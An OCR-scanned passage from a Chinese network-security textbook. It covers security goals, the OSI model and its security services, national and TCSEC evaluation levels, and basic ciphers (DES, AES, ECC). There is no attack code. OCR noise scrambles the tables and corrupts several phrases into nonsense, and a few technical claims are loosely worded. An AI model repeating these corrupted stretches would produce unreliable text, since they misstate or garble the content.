和 非法 使 用 。 主 要 的 威胁 包括 以 下 两 类 : 

。 渗入 威胁 ,如 假冒 . 旁 路 .授权 侵犯 。 

。 植 人 威胁 ,如 特洛伊 木马 、 陷 门 。 
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1.2 网 络 安全 基本 知识 


互联 网 为 人 们 提供 了 快速 .便捷 的 通信 手段 ,促进 了 计算 机 网 络 技术 在 社会 .经 济 各 领 


域 的 广泛 应 用 ,同时 也 为 伺机 窃取 利益 信息 的 不 法 之 徒 提供 了 犯罪 场地 。 随 着 计算 机 网 络 
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用 范围 的 不 断 扩大 ,网 络 安全 问题 已 经 成 为 当今 社会 的 一 个 焦点 。 
1.2.1 网 络 安全 研究 内 容 


网 络 安全 包括 以 下 3 个 方面 的 内 容 。 
CD 计算 机 实体 的 安全 : 在 一 定 的 环境 下 ,对 网 络 系统 中 设备 的 安全 保护 。 
(2) 网 络 系统 运行 安全 : 在 实体 安全 的 前 提 下 ,保证 网 络 系统 不 受 偶然 的 或 恶意 的 威 





,能够 连续 可 靠 地 运行 ,正常 的 网 络 服 务 不 中 断 。 


(3) 信息 安全 : 在 网 络 内 存储 和 处 理 的 信息 资源 具有 绝对 的 保密 性 、 完 整 性 和 可 用 性 ， 


不 存在 被 泄露 .更 改 和 破坏 的 风险 。 确 保 网 络 系 统 的 信息 安全 是 网 络 安全 的 目标 。 


* 保密 性 (confidentiality): 防止 信息 的 非 授 权 访 问 或 泄露 。 信 息 只 限于 授权 用 户 使 
用 ,保密 性 主要 通过 信息 加 密 、 身 份 认证 ,访问 控制 和 安全 通信 协议 等 技术 实现 , 信 
息 加 密 是 防止 信息 非法 泄露 的 最 基本 手段 。 

。 完整 性 (integrity) : 保证 信息 不 会 被 非法 改动 和 销毁 。 保 密 性 强调 信息 不 能 非法 汽 
露 ,而 完整 性 强调 信息 在 存储 和 传输 过 程 中 不 能 被 偶然 或 蓄意 修改 ` 删 除 、 伪 造 、 添 
加 、 破 坏 或 丢失 ,信息 在 存储 和 传输 过 程 中 必须 保持 原样 。 信 息 完 整 性 表明 了 信息 
的 可 靠 性 .正确 性 有效 性 和 一 致 性 ,只 有 完整 的 信息 才 是 可 信任 的 信息 。 

。 可 用 性 Cavailability) : 保证 网 络 资源 随时 可 以 被 合法 用 户 访问 。 可 用 性 是 信息 资源 
容许 授权 用 户 按 需 访问 的 特性 ,有 效 性 是 信息 系统 面向 用 户 服务 的 安全 特性 。 信 息 
系统 只 有 持续 有 效 ,授权 用 户 才 能 随时 随地 根据 自己 的 需要 访问 信息 系统 提供 的 
服务 。 

完整 的 网 络 信息 安全 体系 至 少 应 该 包括 3 类 措施 : 

。 社会 的 法 律 政策 .安全 的 规章 制度 以 及 安全 教育 等 外 部 软环境 。 

。 技术 方面 的 措施 ,如 防火 墙 技术 .网 络 防毒 .信息 加 密 存储 与 通信 、 身 份 验证 、 授 
权 等 。 

。 审计 和 管理 措施 ,同时 包含 了 技术 与 社会 措施 。 

保证 网 络 安全 的 技术 手段 主要 包括 以 下 几 个 方面 : 

。 信息 加 密 : 数据 传输 加 密 、 数 据 存 储 加 密 、 数 据 完整 性 鉴别 和 密 钥 管理 。 

。 身份 验证 和 授权 管理 : 实体 访问 控制 .数据 访问 控制 。 

。 安全 防御 : 防火 墙 技术 、 防 病毒 技术 ,网 络 介质 和 通信 链 路 的 保护 。 

。 安全 审计 和 管理 : 网 络 实时 监控 ,安全 策略 审计 和 漏洞 扫描 。 


1.2.2 网 络 安全 体系 结构 
当前 ,通用 的 网 络 层次 标准 有 OSI 和 TCP/IP 两 种 ( 见 表 1. 2.1)。OSI 是 理论 标准 ， 


TCP/IP 是 工业 的 事实 标准 。 由 于 不 同 的 局 域 网 有 不 同 的 网 络 协议 ,为 了 使 不 同 的 网 络 能 
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够 互联 ,必须 建立 统一 的 网 络 互 连 协议 。 为 此 ,ISO( 国 际 标准 化 组 织 ) 提 出 了 网 络 互 连 协议 
的 基本 框架 , 称 为 开放 系统 互 连 (OSI) 参 考 模型 。 它 将 整个 网 络 的 功能 划分 成 7 个 层次 ,其 
中 应 用 层 、 表 示 层 、 会 话 层 、 传 输 层 被 归 为 高 层 , 而 网 络 层 .数据 链 路 层 、 物 理 层 被 归 为 底层 。 
高 层 负责 主机 之 间 的 数据 传输 ,底层 负责 网 络 数据 传输 。 
表 1.2.1 网 络 体系 层次 
OSI 模型 主要 功能 常见 协议 |TCP/IP 网 络 主要 功能 常见 协议 














应 用 层 提供 应 用 程序 间 通 信 | HTTP, FTP 








表示 层 数据 格式 ,数据 加 密 。 | NBSSL ,LPP | 应 用 层 提供 应 用 程序 接口 HTTP,FTP 





会 话 层 建立 ,维护 和 管理 会 话 | RPC, LDAP 





传输 层 建立 主机 端 到 端 连接 |TCP,UDP | 传输 层 建立 端 到 端 连 接 TCP,UDP 





网 络 层 寻 址 和 路 由 选择 IP, ICMP 
数据 链 路 层 | 介质 访问 和 链 路 管理 | PPP 
物理 层 比特 流传 输 


互联 网 层 寻 址 和 路 由 选择 IP, ICMP 





o | 二 进 制 数据 流传 输 和 
网 络 接口 层 | 机 再 介质 访问 PPP 




















层 与 层 之 间 的 联系 是 通过 各 层 之 间 的 接口 进行 的 ,上 层 通过 接口 向 下 层 提出 服务 请 求 ， 
而 下 层 通 过 接口 向 上 层 提 供 服务 。 除 物理 层 之 外 ,各 对 等 层 之 间 均 不 存在 直接 的 通信 关系 ， 
而 是 通过 各 对 等 层 之 间 的 通信 协议 进行 通信 ,只 有 两 个 物理 层 之 间 通 过 传输 介质 进行 真正 
的 数据 通信 。 


1.2.2.1 OSI 参考 模型 


OST 参考 模型 是 研究 、 设 计 新 的 计算 机 网 络 系统 和 评估 、 改 进 现 有 系统 的 理论 依据 ,是 
理解 和 实现 网 络 安全 的 基础 。 在 OSI 安全 参考 模型 中 主要 包括 安全 服务 (Security 
Service) ,安全 机 制 (Security Mechanism) 和 安全 管理 (Security Management) 。 

网 络 的 安全 服务 包括 以 下 内 容 。 

。 对 等 实体 认证 服务 : 实体 的 合法 性 、 真 实 性 确认 。 

。 访问 控制 服务 : 防止 对 任何 资源 的 非 授权 访问 。 

。 数据 保密 服务 : 加 密 保护 ,防止 被 截获 的 数据 泄密 。 

。 数据 完整 性 服务 : 使 消息 的 接收 者 能 够 发 现 消息 是 否 被 修改 ,是 否 被 攻击 者 用 假 消 

息 换 掉 。 

。 数据 源 点 认证 服务 : 数据 来 自 真正 的 源 点 ,以 防 假冒 。 

。 信息 流 安全 服务 : 通过 流量 填充 阻止 非法 流量 分 析 。 

。 不 可 否认 服务 : 防止 对 数据 源 以 及 数据 提交 的 否认 。 

为 了 实现 这 些 安全 服务 ,需要 以 下 一 系列 安全 机 制作 为 支撑 。 

。 加 密 机 制 : 应 用 现代 密码 学 理论 ,确保 数据 的 机 密 性 。 

。 数字 签名 机 制 : 保证 数据 完整 性 和 不 可 否认 性 。 

。 访问 控制 机 制 : 与 实体 认证 相关 , 且 要 牺牲 网 络 性 能 。 

。 数据 完整 性 机 制 : 保证 数据 在 传输 过 程 中 不 被 非法 入 侵 自 改 。 

。 认证 交换 机 制 : 实现 站 点 、 报 文 .用 户 和 进程 认证 等 。 
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。 流量 填充 机 制 : 针对 流量 分 析 攻 击 而 建立 的 机 制 。 
。 路 由 控制 机 制 : 可 以 指定 数据 通过 网 络 的 路 径 。 
。 公证 机 制 : 用 数字 签名 技术 由 第 三 方 来 提供 公正 仲裁 。 


1.2.2.2 网 络 安全 控制 系统 


通过 对 网 络 应 用 的 全 面 了 解 ,按照 安全 风险 .需求 分 析 结 果 、 安 全 策略 以 及 安全 目标 ,在 
进行 安全 控制 系统 设计 时 应 从 物理 安全 、 系 统 安全 、 网 络 安全 应 用 安全 ,管理 安全 等 方面 加 
以 考虑 。 

D 物理 安全 : 保障 整个 网 络 系 统 安全 的 前 提 , 保 护 计算 机 网 络 的 物理 通路 不 被 损坏 、 
不 被 窃听 以 及 不 被 攻击 和 干扰 。 物 理 安全 包括 环境 安全 .设备 安全 和 媒体 安全 3 个 方面 。 
防范 措施 包括 : 对 重要 信息 存储 、 收 发 部 门 进行 屏蔽 处 理 , 防 止 信号 外 汇 ; 对 局 域 网 传输 线 
路 传输 辐射 的 抑制 ;对 终端 设备 辐射 的 防范 。 

(2) 系统 安全 : 包括 网 络 结构 安全 、 操 作 系 统 安全 和 应 用 系统 安全 。 网 络 结构 安全 指 
网 络 拓扑 结构 是 否 合理 、 线 路 是 否 宛 余 .路 由 是 否 宛 余 以 及 防止 单 点 失败 等 。 安 全 防范 策略 
包括 : 尽量 采用 安全 性 较 高 的 网 络 操作 系统 并 进行 必要 的 安全 配置 ;关闭 不 常用 却 存在 安 
全 隐患 的 应 用 ;对 保存 有 用 户 信息 及 其 口令 的 关键 文件 使 用 权限 进行 严格 限制 ;通过 配备 安 
全 扫描 系统 对 操作 系统 进行 安全 性 扫描 ,及 时 发 现 安全 漏洞 ;应 用 服务 器 应 关闭 一 些 不 经 常 
使 用 的 协议 及 协议 端口 号 .加 强身 份 认证 ,严格 限制 登录 者 的 操作 权限 。 

O 网 络 安全 : 网 络 安全 是 整个 安全 解决 方案 的 关键 ,通过 访问 控制 ,通信 保密 、 入 侵 
检测 、 网 络 安全 扫描 系统 、 防 病毒 工具 等 措施 来 保障 。 隔 离 与 访问 控制 可 通过 严格 的 管理 制 
度 划 分 虚拟 子 网 (VLAN) \ 配 备 防火 墙 来 进行 ;防火 墙 是 实现 网 络 安全 最 基本 、 最 经 济 、 最 有 
效 的 安全 措施 之 一 , 它 通 过 制定 严格 的 安全 策略 实现 内 外 网 络 或 内 部 网 络 不 同 信任 域 之 间 
的 隔离 与 访问 控制 ;通信 保密 使 得 数据 以 密 文 形式 在 网 络 上 传输 ,可 以 选择 链 路 层 加 密 和 网 
络 层 加 密 等 方式 ;入 侵 检测 是 根据 已 有 攻击 手段 的 信息 代码 对 所 有 网 络 操作 行为 进行 实时 
监控 ,记录 ,并 按 制定 的 策略 予以 响应 ,从 而 防止 针对 网 络 的 攻击 与 犯罪 行为 ;网 络 扫描 系统 
可 以 对 网 络 中 所 有 部 件 (Web 站 点 、 防 火 墙 路由器、TCP/IP 及 相关 协议 服务 ) 进行 攻击 性 
扫描 、 分 析 和 评估 ,发 现 并 报告 系统 存在 的 弱点 和 漏洞 ,评估 安全 风险 ,建议 补救 措施 ;病毒 
防护 也 是 网 络 安全 建设 的 重要 环节 之 一 ' 反 病毒 技术 包括 预防 病毒 .检测 病毒 和 杀毒 3 种 
技术 。 

(4) 应 用 安全 : 表现 在 内 部 网 络 系统 中 资源 共享 和 信息 存储 等 方面 。 严 格 控制 内 部 员 
工 对 网 络 共享 资源 的 使 用 ,在 内 部 子 网 中 一 般 不 开放 共享 目录 ,对 有 经 常 交换 信息 需求 的 用 
户 ,在 共享 时 必须 加 装 口令 认证 机 制 。 对 数据 库 服 务 器 中 的 数据 库 必须 进行 安全 备份 ,通过 
网 络 备份 系统 ,也 可 以 进行 远程 备份 存储 。 

(5) 安全 管理 : 通过 制定 健全 的 安全 管理 体制 ,构建 安全 管理 平台 ,增强 人 员 的 安全 防 
范 意识 。 制 定 健全 的 安全 管理 体制 是 网 络 安全 得 以 实现 的 重要 保证 ;应 经 常 对 人 员 进 行 网 
络 安全 防范 意识 的 培训 ,全 面 提 高 人 员 的 网 络 安全 防范 意识 ;组 建安 全 管理 子 网 ,安装 集中 
统一 的 安全 管理 软件 ,如 病毒 软件 管理 系统 、 网 络 设备 管理 系统 以 及 网 络 安全 设备 统一 管理 
软件 ,通过 安全 管理 平台 实现 全 网 的 安全 管理 。 
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1.2.2.3 安全 体系 设计 


安全 体系 设计 原则 包括 以 下 3 个 方面 。 

(1) 需求 风险、 代价 平衡 分 析 的 原则 : 对 任 一 网 络 来 说 ,绝对 安全 难以 达到 。 要 进行 
实际 分 析 , 对 网 络 面临 的 威胁 及 可 能 承担 的 风险 进行 定性 与 定量 相 结合 的 分 析 , 制 定 规范 和 
措施 ,确定 系统 安全 策略 。 

(2) 一 致 性 原则 : 网 络 安全 问题 应 与 网 络 的 生命 周期 并 存 , 制 定 的 安全 体系 结构 必须 
与 网 络 的 安全 需求 相 一 致 。 

(3) 易 操 作 性 原则 : 安全 措施 要 具有 便利 性 和 可 操作 性 ,考虑 管理 人 员 的 自身 素质 ,对 
操作 人 员 的 要 求 不 易 过 高 。 


1.2.2.4 网 络 安全 策略 


网 络 安全 策略 应 考虑 安全 管理 策略 和 安全 技术 实施 策略 两 个 方面 。 

COD) 安全 管理 策略 : 即使 是 最 好 的 、 最 值得 信赖 的 系统 安全 措施 ,也 不 能 完全 由 计算 机 
系统 独立 完成 ,需要 建立 完备 的 安全 组 织 和 管理 制度 ,以 约束 操作 人 员 。 

(2) 安全 技术 实施 策略 : 要 针对 网 络 、 操 作 系 统 ,数据 库 和 信息 共享 授权 提出 具体 的 
措施 。 

计算 机 信息 系统 的 安全 管理 主要 基于 3 个 原则 , 即 多 人 负责 原则 、 任 期 有 限 原 则 和 职责 
分 离 原则 。 由 于 网 络 互联 在 链 路 层 、 网 络 层 \ 传 输 层 、 应 用 层 等 不 同 协议 层 均 有 体现 , 且 各 层 
的 功能 和 安全 特性 不 同 ,因而 其 网 络 安 全 措施 也 不 相同 。 

物理 层 安全 涉及 传输 介质 的 安全 特性 . 抗 干 扰 、 防 窃听 是 制定 物理 层 安全 措施 的 重点 。 

在 链 路 层 , 可 以 通过 建立 虚拟 局 域 网 ,对 物理 和 逻辑 网 段 进行 有 效 的 分 制 和 隔离 , 消除 
不 同安 全 级 别 逻 辑 网 段 间 的 窃听 风险 。 

在 网 络 层 ,可 通过 对 不 同 子 网 的 定义 和 对 路 由 器 的 路 由 表 的 控制 来 限制 子 网 间 的 通信 ， 
同时 ,利用 网 关 的 安全 控制 能 力 ,限制 节点 的 通信 和 应 用 服务 ,加 强 对 外 部 用 户 的 识别 和 验 
证 能 力 。 

1.2.3 网 络 安全 评价 标准 


网 络 安全 评价 标准 中 比较 流行 的 是 1985 年 美国 国防 部 制定 的 《可 信任 计算 机 标准 评价 
准则 》, 各 国 根据 自己 的 国情 也 都 制定 了 相关 的 标准 。 


1.2.3.1 中 国 评价 标准 


在 我 国 ,1999 年 10 月 经 过 国家 质量 技术 监督 局 批准 发 布 的 (计算 机 信息 系统 安全 保护 
等 级 划分 准则 ;将 计算 机 安全 保护 划分 为 以 下 5 个 级 别 。 

第 1 级 为 用 户 自 主 保护 级 (GB1 KER): 它 的 安全 保护 机 制 使 用 户 具 备 自主 安全 保护 
的 能 力 ,保护 用 户 的 信息 免 受 非法 的 读 写 破坏 。 

第 2 级 为 系统 审计 保护 级 (GB2 安全 级 ): 除 具 备 第 1 级 所 有 的 安全 保护 功能 外 ,要 求 
创建 和 维护 访问 的 审计 跟踪 记录 ,使 所 有 的 用 户 对 自己 的 行为 的 合法 性 负责 。 

第 3 级 为 安全 标记 保护 级 (GB3 KER): 除 继承 前 一 个 级 别 的 安全 功能 外 ,还 要 求 以 
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访问 对 象 标记 的 安全 级 别 限制 访问 者 的 访问 权限 ,实现 对 访问 对 象 的 强制 保护 。 

第 4 级 为 结构 化 保护 级 (GB4 安全 级 ): 在 继承 前 面 安全 级 别 安全 功能 的 基础 上 ,将 安 
全 保护 机 制 划分 为 关键 部 分 和 非 关 键 部 分 ,对 关键 部 分 直接 控制 访问 者 对 访问 对 象 的 存 取 ， 
从 而 加 强 系统 的 抗 渗透 能 力 。 

第 5 级 为 访问 验证 保护 级 (GB5 安全 级 ): 这 一 级 别 特别 增设 了 访问 验证 功能 ,负责 仲 
裁 访问 者 对 访问 对 象 的 所 有 访问 活动 。 

从 20 世纪 80 年 代 中 期 开始 ,我 国 自主 制定 和 采用 了 一 批 相 应 的 信息 安全 标准 。 但 是 ， 
应 该 承认 ,标准 的 制定 需要 较为 广泛 的 应 用 经 验 和 较为 深入 的 研究 背景 。 这 两 方面 的 差距 ， 
使 我 国 的 信息 安全 标准 化 工作 与 国际 已 有 的 工作 相 比 ,覆盖 的 范围 还 不 够 大 ,宏观 和 微观 的 
指导 作用 也 有 待 进一步 提高 。 

1.2.3.2 国际 评价 标准 

美国 国防 部 开发 的 计算 机 安全 标准 《可 信任 计算 机 标准 评价 准则 》(CTrusted 
Computer Standards Evaluation Criteria, TCSEC) , 即 网 络 安全 橙 皮 书 ,自从 1985 年 成 为 美 
国 国防 部 的 标准 以 来 ,一 直 是 评估 多 用 户主 机 和 小 型 操作 系统 的 主要 方法 。 其 他 子 系统 (如 
数据 库 和 网 络 ) 也 一 直 用 橙 皮 书 来 解释 评估 。 柳 皮 书 把 安全 的 级 别 从 低 到 高 分 成 4 个 类 别 : 
D 类 C 类 .B 类 和 A 类 ,每 类 又 细 分 为 几 个 级 别 , 如 表 1.2.2 所 示 。 

表 1.2.2 网 络 安全 评价 级 别 


























类 il 级 别 名 R 主要 特征 

D D 低级 保护 没有 安全 保护 

c CI 自主 安全 保护 自主 存储 控制 
C2 受 控 存 储 控制 单独 的 可 查 性 ,安全 标识 
Bl 标识 的 安全 保护 强制 存 取 控 制 , 安 全 标识 

B B2 结构 化 保护 面向 安全 的 体系 结构 , 较 好 的 抗 渗透 能 力 
B3 安全 区 域 存 取 监 控 \ 高 抗 渗透 能 力 

A A 验证 设计 形式 化 的 最 高 级 描述 和 验证 











D 级 是 最 低 的 安全 级 别 ,拥有 这 个 级 别 的 操作 系统 就 像 一 个 门户 大 开 的 房子 ,任何 人 都 
可 以 自由 进出 ,是 完全 不 可 信任 的 。 对 于 硬件 来 说 ,没有 任何 保护 措施 ,操作 系统 容易 受到 
损害 ,没有 系统 访问 限制 和 数据 访问 限制 ,任何 人 不 需 任 何 账户 都 可 以 进入 系统 ,不 受 任 何 
限制 可 以 访问 他 人 的 数据 文件 。 属 于 这 个 级 别 的 操作 系统 有 DOS 和 Windows 98 等 。 

Cl 是 C 类 的 一 个 安全 子 级 。Cl 又 称 选 择 性 安全 保护 (Discretionary Security 
Protection) 系统 , 它 描述 了 一 个 典型 的 用 在 UNIX 系统 上 的 安全 级 别 。 这 种 级 别 的 系统 对 
硬件 有 某 种 程度 的 保护 ,如 用 户 拥有 注册 账号 和 口令 ,系统 通过 账号 和 口令 来 识别 用 户 是 否 
合法 ,并 决定 用 户 对 程序 和 信息 拥有 何 种 访问 权限 ,但 硬件 受到 损害 的 可 能 性 仍然 存在 。 

C2 级 除了 包含 Cl 级 的 特征 外 ,还 具有 访问 控制 环境 (Controlled Access Environment) 
权力 , 即 具 有 进一步 限制 用 户 执 行 某 些 命令 或 者 访问 某 些 文件 的 权限 ,而 且 还 加 入 了 身份 认 
证 等 级 。 另 外 ,系统 对 事件 进行 审计 并 写 入 日志 中 ,如 何 时 开机 、 用 户 在 何 时 何 地 登录 系统 
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等 ,通过 查看 日 志 , 就 可 以 发 现 人 侵 痕迹 。 审 计 除 了 可 以 记录 下 系统 管理 员 执 行 的 活动 以 
外 ,还 加 入 了 身份 认证 级 别 。 该 级 别 的 缺点 在 于 它 需 要 额外 的 处 理 时 间 和 磁盘 空间 。 

使 用 附加 身份 验证 就 可 以 让 一 个 C2 级 系统 用 户 在 不 是 超级 用 户 的 情况 下 有 权 执 行 系 
统管 理 任务 。 授 权 分 级 使 系统 管理 员 能 够 给 用 户 分 组 ,授予 他 们 访问 某 些 程序 的 权限 或 访 
问 特定 的 目录 。 能 够 达到 C2 级 别 的 常见 操作 系统 有 : UNIX AA. Novell 3. X 或 者 更 高 版 
本 以 及 Windows NT, Windows 2000 和 Windows 2003, 

B 级 中 有 3 个 级 别 ,Bl 级 即 标志 安全 保护 (Labeled Security Protection) ,是 支持 多 级 安 
全 (如 秘密 和 绝密 ) 的 第 一 个 级 别 , 这 个 级 别 说 明 处 于 强制 性 访问 控制 之 下 的 对 象 ,系统 不 多 
许 文 件 的 拥有 者 改变 其 许可 权限 。 这 种 安全 级 别 的 计算 机 系统 一 般 用 在 政府 机 构 中 ,如 国 
防 部 和 国家 安全 局 的 计算 机 系统 。 

B2 RK. MPR Fg HEP (Structured Protection) 级 别 , 它 要 求 计算 机 系统 中 所 有 的 对 象 都 
要 加 上 标签 ,而 且 给 设备 (磁盘 、 磁 带 和 终端 ) 分 配 单个 或 者 多 个 安全 级 别 。 

B3 级 ,又 称 安全 域 (Security Domain) 级 别 ,使 用 安装 硬件 的 方式 来 加 强 域 的 安全 , 例 
如 ,内 存 管 理 硬件 用 于 保护 安全 域 免 遭 无 授权 访问 或 更 改 其 他 安全 域 的 对 象 。 该 级 别 也 要 
求 用 户 通过 一 条 可 信任 途径 连接 到 系统 上 。 

A 级 ,又 称 验证 设计 (Verified Design) 级 别 , 是 当前 橙 皮 书 的 最 高 级 别 , 它 包含 了 一 个 
严格 的 设计 ,控制 和 验证 过 程 。 安 全 级 别 设计 必须 从 数学 角度 上 进行 验证 ,而 且 必 须 进行 秘 
密 通道 和 可 信任 分 布 分 析 。 

可 信任 分 布 (Trusted Distribution) 的 含义 是 : 硬件 和 软件 在 物理 传输 过 程 中 受到 保 
护 ,以 防止 破坏 安全 系统 。 


1.2.4 信息 安全 定义 


信息 安全 是 指 信息 网 络 的 硬件 .软件 及 其 系统 中 的 数据 受到 保护 ,不 受 偶然 的 或 者 恶意 
的 原因 而 遭 到 破坏 、 更 改 、 泄 露 ,系统 连续 、 可 靠 . 正 常 地 运行 ,信息 服务 不 中 断 。 信 息 安 全 是 
一 门 涉及 计算 机 科学 、 网 络 技术 .通信 技术 、 密 码 技 术 、 信 息 安 全 技术 .应 用 数学 .数论 和 信息 
论 等 多 种 学 科 的 综合 性 学 科 。 

随 着 信息 安全 技术 的 发 展 ,我 们 经 历 了 从 基本 安全 隔离 和 主机 加 固 阶段 到 后 来 的 网 络 
认证 阶段 ,直到 将 行为 监控 和 审计 也 纳入 安全 的 范畴 。 这 样 的 演变 不 仅仅 是 为 了 避免 恶意 
攻击 ,更 重要 的 是 为 了 提高 网 络 的 可 信和 度 。 

信息 安全 的 内 涵 在 不 断 地 延伸 ,从 最 初 的 信息 保密 性 发 展 到 信息 的 完整 性 .可 用 性 、 可 
控 性 和 不 可 否认 性 ,进而 又 发 展 为 “ 攻 ( 攻 击 )、 防 (防范 ) 、 测 (检测 ) 、 控 (控制 ) 、 管 (管理 )、 评 
〈 评 估 ) "等 多 方面 的 基础 理论 和 实施 技术 。 

从 广义 上 讲 , 凡 是 涉及 网 络 上 信息 的 保密 性 、 完 整 性 .可 用 性 真实 性 和 可 控 性 的 相关 技 
术 和 理论 都 是 网 络 安全 的 研究 领域 。 目 前 常用 的 基础 性 安全 技术 包括 以 下 内 容 。 

。 身份 认证 技术 : 用 来 确定 用 户 或 者 设备 身份 的 合法 性 ,典型 的 手段 有 口令 .身份 识 

别 `.PKI 证 书 和 生物 认证 等 。 

。 加 解密 技术 : 在 传输 过 程 或 存储 过 程 中 进行 信息 数据 的 加 解密 ,典型 的 加 密 体 制 可 

采用 对 称 加 密 和 非 对 称 加 密 。 

。 边界 防护 技术 : 防止 外 部 网 络 用 户 以 非法 手段 进入 内 部 网 络 , 保 护 内 部 网 络 操作 环 
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境 , 典 型 的 设备 有 防火 墙 和 入侵 检测 设备 。 

。 访问 控制 技术 : 保证 网 络 资源 不 被 非法 使 用 和 访问 。 访 问 控制 是 网 络 安全 防范 和 
保护 的 主要 核心 策略 ,在 身份 识别 的 基础 上 ,根据 身份 对 提出 资源 访问 的 请 求 加 以 
权限 控制 。 

。 主机 加 固 技 术 : 主机 加 固 技术 对 操作 系统 、 数 据 库 等 进行 漏洞 加 固 和 保护 ,提高 系 
统 的 抗 攻 击 能 力 。 

。 安全 审计 技术 : 包含 日 志 审 计 和 行为 审计 ,通过 日 志 审 计 协 助 管理 员 评 估 网 络 配 置 
的 合理 性 、 安 全 策略 的 有 效 性 ;通过 对 用 户 的 网 络 行为 审计 ,确认 行为 的 合 规 性 , 确 
保管 理 的 安全 。 

随 着 信息 网 络 的 不 断 普及 ,网 络 攻 击 手段 也 不 断 复杂 化 、 多 样 化 , 随 之 产生 的 信息 安全 
技术 和 解决 方案 也 在 不 断 发 展 变 化 ,安全 产品 和 解决 方案 也 更 趋 于 合理 化 、 适 用 化 。 经 过 多 
年 的 发 展 ,安全 防御 体系 已 由 "被动 防 范 ” 向 “主动 防御 ”发 展 ,由 “保护 网 络 ” 向 “保护 资产 ”过 
渡 , 并 逐步 构建 出 具有 可 防 、 可 控 \、 可 信 特点 的 信息 网 络 架 构 。 


1.3 网 络 安全 实验 基本 要 求 


1.3.1 实验 目的 


通过 网 络 安全 实验 使 学 生 认识 网 络 安全 技术 的 基本 概念 .原理 和 技术 ,掌握 基本 的 网 络 
安全 攻防 技术 ,常用 工具 的 使 用 方法 及 原理 ,加 深 对 课堂 理论 教学 的 理解 ;培养 学 生 的 实验 
技能 、 动 手 能 力 以 及 分 析 问 题 和 解决 问题 的 能 力 。 


1.3.2 实验 要 求 


通过 本 实验 课程 的 学 习 , 学 生 应 达到 下 列 基本 要 求 : 

(1) 了 解 计算 机 网 络 安全 的 重要 性 以 及 相关 的 法 律 法 规 ,建立 网 络 安全 意识 。 

(2) 掌握 计算 机 网 络 安全 方面 的 基本 技术 ,能 对 系统 的 安全 问题 提出 相应 的 对 策 。 
(3) 掌握 网 络 安全 的 防范 技术 和 防 计算 机 病毒 技术 。 
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2.1.1 基本 概念 


密码 学 (Cryptology) 一 词 是 由 希腊 字 根 “隐藏 "(Krypt6s) 及“ 信息”(l6gos) 组 合 而 成 。 
泛 指 一 切 有 关 密 码 通 信 的 研究 内 容 , 密 码 具 有 信息 加 密 、 可 鉴别 性 、 完 整 性 、 抗 抵赖 性 等 作 
用 。 密 码 学 是 研究 编制 密码 和 破译 密码 的 技术 科学 。 研 究 密 码 变化 的 客观 规律 ,应 用 于 编 
制 密码 以 保守 通信 秘密 的 , 称 为 编码 学 ;应 用 于 破译 密码 以 获取 通信 情报 的 , 称 为 破译 学 ,总 

密码 是 通信 双方 按照 约定 的 法 则 进行 信息 特殊 变换 的 一 种 重要 保密 手段 。 依 照 这 些 法 
则 , 变 明文 为 密 文 , 称 为 加 密 变 换 ; 变 密 文 为 明文 , 称 为 解密 变换 。 密 码 在 早期 仅 对 文字 或 数 
码 进行 加 密 和 解密 变换 , 随 着 通信 技术 的 发 展 , 对 语音 、 图 像 . 数 据 等 都 可 实施 加 密 和 解密 变 
换 。 密 码 学 是 在 编码 与 破译 的 斗争 实践 中 逐步 发 展 起 来 的 ,并 随 着 先进 科学 技术 的 应 用 ,已 
成 为 一 门 综合 性 的 尖端 技术 科学 。 

密码 体制 也 称 为 密码 系统 ,是 指 能 完整 地 解决 信息 安全 性 中 机 密 性 .数据 完整 性 .认证 、 
身份 识别 .可 控 性 及 不 可 抵赖 性 等 问题 中 的 一 个 或 者 多 个 的 完整 系统 。 要 对 一 个 密码 体制 
进行 正规 描述 ,需要 用 数学 方法 清楚 地 描述 其 中 的 各 种 对 象 . 参 数 、 解 决 问题 所 使 用 的 算 


2.1.2 密码 算法 


在 网 络 安全 领域 常见 的 加 密 算法 有 以 下 3 种 。 

1. DES 算法 

DES 算法 属于 密码 体制 中 的 对 称 密码 体制 ,又 称 为 美国 数据 加 密 标 准 , 是 1972 年 美国 
IBM 公司 研制 的 对 称 密码 体制 加 密 算法 。 其 密 钥 长 度 为 56 位 ,明文 按 64 位 进行 分 组 ,将 
分 组 后 的 明文 根据 56 位 的 密 钥 按 位 替代 或 交换 的 方法 形成 密 文 。 

DES 算法 的 特点 是 : 分 组 较 短 、 密 钥 很 短 ,密码 生命 周期 短 is SEXE JE BERE. DES 算法 
的 人 口 参数 有 Key Data 和 Mode. Key 为 加 密 解 密使 用 的 密 钥 ,Data 为 加 密 解 密 的 数据 ， 
Mode 为 其 工作 模式 。 当 模式 为 加 密 模式 时 ,明文 按照 64 位 进行 分 组 ,形成 明文 组 ,Key 用 
于 对 数据 加 密 ; 当 模式 为 解密 模式 时 ,Key 用 于 对 数据 解密 。 实 际 运用 中 , 密 钥 只 用 到 了 64 
位 中 的 56 位 ,这 样 才 具有 高 的 安全 性 。 

2. AES 算法 

AES(Advanced Encryption Standard, 高 级 加 密 标准 ) 加 密 算法 是 下 一 代 的 加 密 算法 标 
准 ,速度 快 ,安全 级 别 高 。2000 年 10 月 ,NIST( 美 国 国家 标准 和 技术 协会 ) 从 15 种 候选 算 
法 中 选 出 AES 算法 作为 新 的 密 钥 加 密 标 准 。AES 算法 正 日 益 成 为 电子 数据 加 密 的 实际 
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标准 。 

AES 是 一 个 迭代 的 、 对 称 密 钥 分 组 的 密码 , 它 可 以 使 用 128,192 和 256 位 密 钥 ,并 且 用 
128 位 (16B) 分 组 加 密 和 解密 数据 。AES 算法 基于 排列 和 置换 运算 ,通过 分 组 密码 返回 的 
加 密 数 据 的 位 数 与 输入 数据 的 相同 ,使 用 循环 结构 进行 迭代 加 密 , 在 该 循环 中 重复 置换 和 车 
换 输入 数据 。 

3. ECC 算法 

又 称 椭圆 曲线 加 密 系统 ,是 目前 已 知 的 所 有 公 钥 密码 体制 中 能 够 提供 最 高 比特 强度 的 
一 种 公 钥 体制 。 用 椭圆 曲线 来 构造 密码 体制 ,用 户 可 以 任意 地 选择 安全 的 椭圆 曲线 ,在 确定 
了 有 限 域 后 ,椭圆 曲线 的 选择 范围 很 大 ;椭圆 曲线 密码 体制 的 另 一 个 优点 是 一 旦 选择 恰当 的 
椭圆 曲线 ,就 没有 有 效 的 指数 算法 来 攻击 它 。 


2.1.3 网络 安全 应 用 


密码 学 在 网 络 安全 中 的 具体 应 用 主要 包括 以 下 几 种 形式 。 

1. 用 于 认证 服务 

密码 学 在 网 络 安全 应 用 中 使 网 络 上 的 用 户 可 以 相互 证 明 自 己 的 身份 , 即 能 正确 对 信息 
